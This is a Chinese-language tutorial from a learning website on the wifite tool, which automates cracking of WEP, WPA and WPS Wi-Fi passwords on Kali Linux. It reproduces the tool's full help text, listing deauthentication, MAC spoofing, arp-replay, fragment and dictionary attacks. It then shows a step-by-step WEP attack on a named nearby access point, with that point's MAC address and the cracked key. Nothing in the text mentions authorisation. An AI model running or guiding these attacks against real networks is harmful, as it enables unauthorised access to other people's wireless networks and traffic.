前端开发入门到精通的在线学习网站

网站首页 > 资源文章 正文

linux下wifite无线终端工具详解(linux无线连接)

qiguaw 2024-11-09 13:04:26 资源文章 11 ℃ 0 评论

一、工具简介

wifite是一款自动化无线wep、wpa密码获取工具,不支持windows和osx。wifite的特点是可以同时操作多个采用wep和wpa加密的网络。wifite只需简单的配置即可自动化运行,期间无需人工干预。

工具特点:

  • 通过信号强度(dB)对目标进行排序; 首先获取最近的接入点
  • 自动取消身份验证隐藏网络的客户端以显示SSID
  • 许多过滤器可以准确地指定要攻击的内容(wep/wpa/both, above certain signal strengths, channels, etc)
  • 可定制设置(timeouts, packets/sec, etc)
  • “匿名”功能; 操作前将MAC更改为随机地址,然后在攻击完成后更改
  • 所有捕获的WPA握手都备份到wifite.py的当前目录
  • 智能WPA去认证; 所有客户端和广播呼叫之间的循环
  • 停止任何攻击与Ctrl + C,选项继续,移动到下一个目标,跳到获取或退出
  • 退出时显示会议摘要; 显示任何获取的密钥
  • 所有密码保存到cracked.txt


二、wifite工具包

root@kali:~# wifite -h

  .;'                     `;,
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'
           /       \

   命令
    -check <file>   检查capfile <文件>进行握手。
    -cracked        显示以前已获取的接入点

   GLOBAL 
    -all            攻击所有目标.                        [off]
    -i <iface>      用于捕获的无线接口                   [auto]
    -mac            匿名mac地址                          [off]
    -c <channel>    频道扫描目标                         [auto]
    -e <essid>      通过ssid定位特定的接入点 (name)      [ask]
    -b <bssid>      通过bssid定位一个特定的接入点 (mac)  [auto]
    -showb          扫描后显示目标BSSID                  [off]
    -pow <db>       用信号强度攻击任何目标          > db [0]
    -quiet          扫描期间不要打印AP列表               [off]


   WPA
    -wpa            仅针对WPA网络 (works with -wps -wep)   [off]
    -wpat <sec>     等待WPA攻击完成的时间 (seconds)        [500]
    -wpadt <sec>    发送deauth数据包之间等待的时间 (sec)   [10]
    -strip          使用tshark或pyrit进行握手              [off]
    -crack <dic>    使用<dic> wordlist文件破解WPA握手      [off]
    -dict <file>    指定要在获取WPA时使用的字典            [phpbb.txt]
    -aircrack       使用aircrack验证握手                   [on]
    -pyrit          使用pyrit验证握手                      [off]
    -tshark         使用tshark验证握手                     [on]
    -cowpatty       用cowpatty验证握手                     [off]

   WEP
    -wep            只针对WEP网络                 [off]
    -pps <num>      设置每秒注入的数据包数        [600]
    -wept <sec>     秒等待每次攻击,0意味着无休止 [600]
    -chopchop       使用chopchop攻击              [on]
    -arpreplay      使用arpreplay攻击             [on]
    -fragment       使用碎片攻击                  [on]
    -caffelatte     使用caffe-latte攻击           [on]
    -p0841          使用-p0841攻击                [on]
    -hirte          使用 hirte (cfrag)攻击        [on]
    -nofakeauth     如果假认证失败,则停止攻击    [off]
    -wepca <n>      当iv的数量超过n时开始破解     [10000]
    -wepsave        将.cap文件的副本保存到此目录  [off]

   WPS
    -wps        只针对WPS网络                                 [off]
    -wpst <sec>     最大等待新的重试,然后放弃(0: never)      [660]
    -wpsratio <per> 成功的PIN尝试次数/总尝试次数的最小比例    [0]
    -wpsretry <num> 在放弃之前,同一个PIN的最大重试次数       [0]

   EXAMPLE
    ./wifite.py -wps -wep -c 6 -pps 600

 [+] quitting

wifite 使用示例

使用WPS操作(-pow 50),操作超过50 dB功率(-wps)的接入点:

root@kali:~# wifite -pow 50 -wps

  .;'                     `;,    
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,  
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'     
           /       \             

 [+] targeting WPS-enabled networks

 [+] scanning for wireless devices...
 [+] enabling monitor mode on wlan0... done
 [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.


三、实战wifite自动化获取WEP加密密码

在终端下启动wifite工具:

root@kali:~# wifite

等个几秒就会扫描出附近的wifi

让他先扫描,当CLIENT下面出现client时按”CTRL+C”:他会提示你要你输入编号,这里我就输入”4”,因为4采用的是WEP加密的。

输入之后确定,就会出现以下提示

[+] select target numbers (1-17) separated by commas, or 'all': 4
[+] 1 target selected.
[0:10:00] preparing attack "Tp-Link_F59C20" (14:E6:E4:AC:FB:20)
 [0:10:00] attempting fake authentication (5/5)… failed
 [0:10:00] attacking "Tp-Link_F59C20" via arp-replay attack
 [0:09:06] started cracking (over 10000 ivs)
 [0:09:00] captured 12492 ivs @ 418 iv/sec
 [0:09:00] cracked Tp-Link_F59C20 (14:E6:E4:AC:FB:20)! key: "12345678"
 [+] 1 attack completed:
 [+] 1/1 WEP attacks succeeded
        cracked Tp-Link_F59C20 (14:E6:E4:AC:FB:20), key: "12345678"
 [+] disabling monitor mode on mon0… done
 [+] quitting

从以上输出信息中,可以看到获取成功。其中,Tp-Link_F59C20无线接入点的密码是12345678。

Tags:

本文暂时没有评论,来添加一个吧(●'◡'●)

欢迎 发表评论:

最近发表
标签列表